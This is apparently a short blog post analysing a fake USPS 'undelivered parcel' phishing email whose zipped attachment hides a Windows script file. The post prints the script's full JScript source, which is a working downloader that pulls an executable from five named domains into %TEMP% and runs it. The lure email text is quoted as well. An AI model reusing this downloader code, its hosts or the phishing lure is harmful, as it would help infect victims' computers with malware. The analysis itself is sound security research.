At the moment I am receiving lot off SPAM claiming that there's an issue with a delivery.

I want to share the latest one with you:

Email:

FROM: USPS Priority Parcels willie.ritchie@royalfoods.ru

SUBJECT: USPS issue #02605688: unable to delivery parcel

ATTACHMENT: Undelivered-Package-02605688.zip

CONTENT:

Dear Martin,

This is to confirm that your item has been shipped at December 15.

Please check the attachment for complete details!

Yours faithfully, Willie Ritchie, USPS Chief Station Manager.

Attachment:

I unzipped the attachment and got a file called Undelivered-Package-02605688.doc.wsf. OK a windows script file which looks like a doc on most windows systems :/ Let's look what's inside:

<job>
<script language=JScript>
function ge() { 
  var rt = 0; 
  try { 
    xo.open("GET","http://"+ll[i]+"/counter/"+x+n, false); 
    xo.send(); 
    if(xo.status==200) { 
      xa.open(); 
      xa.type=1; 
      xa.write(xo.responseBody); 
      if(xa.size>100000) { 
        var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+n+"153146.exe";     
        xa.saveToFile(fn,2); 
        try { 
          ws.Run(fn,1,0); 
          rt = 1; 
        } catch(er){
        }; 
      }; 
      xa.close(); 
    }; 
  } catch(er){
  }; 
  return rt; 
} 

var i=0; 
var xo = WScript.CreateObject("Msxml2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var ws = WScript.CreateObject("WScript.Shell"); 
var ll = new Array("capsynch.com", 
 "aventurarealestatedirectory.com",
 "www.pratomoscaclub.it",
 "www.apogeoform.net",
 "www.iblasoni.com"); 
var x = "?a=228567&i=Y5rzyqa6RhRlpw19Jl94p4F1b4I22hWFQ0_HjXbKHychcZyn0b_kMs1eEwV0pM5uEJsjRyZ3a1bm7F-R2AJJb7coBJcrLA&r="; 

for(var n=1;n<=2;n++) { 
  while (i<ll.length) { 
    if(ge() == 1) { 
      break; 
    }; 
    i++; 
  }; 
};</script></job>

Nice, seems like we found a little downloader :D. I'll try to download the stuff from the domains above tomorrow to see what's actually happending if somebody clicks this attachment. Hopefully the files are still online then. Stay tuned

UPDATE: As promised, here are the results. Unfortunatelly I was too slow and the downloads are no longer available.